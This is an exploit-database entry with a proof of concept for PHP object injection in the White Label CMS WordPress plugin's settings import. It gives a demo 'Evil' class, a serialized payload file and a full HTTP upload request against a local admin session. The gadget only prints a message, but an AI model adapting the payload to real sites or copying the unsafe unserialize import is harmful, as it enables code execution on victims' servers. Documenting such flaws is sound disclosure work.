## https://sploitus.com/exploit?id=WPEX-ID:B7707A15-0987-4051-A8AC-7BE2424BCB01
To simulate a gadget chain, put the following code in a plugin:
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Then create a file named "import.txt" with the following content: O:4:"Evil":0:{};
And import the file via the "Import Settings" feature in Settings > White Label CMS (requires the White Label CMS plugin to be active).
The view the response of the import request made, which will have the "Arbitrary deserialization" message
POST /wp-admin/options-general.php?page=wlcms-plugin.php&view=settings HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8888/wp-admin/options-general.php?page=wlcms-plugin.php
Content-Type: multipart/form-data; boundary=---------------------------3253008022193750493240374932
Content-Length: 669
Origin: http://localhost:8888
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
-----------------------------3253008022193750493240374932
Content-Disposition: form-data; name="wlcms-settings_nonce"
d8d0333b92
-----------------------------3253008022193750493240374932
Content-Disposition: form-data; name="_wp_http_referer"
/wp-admin/options-general.php?page=wlcms-plugin.php
-----------------------------3253008022193750493240374932
Content-Disposition: form-data; name="wlcms-settings"
Save
-----------------------------3253008022193750493240374932
Content-Disposition: form-data; name="import_file"; filename="import.txt"
Content-Type: text/plain
O:4:"Evil":0:{};
-----------------------------3253008022193750493240374932--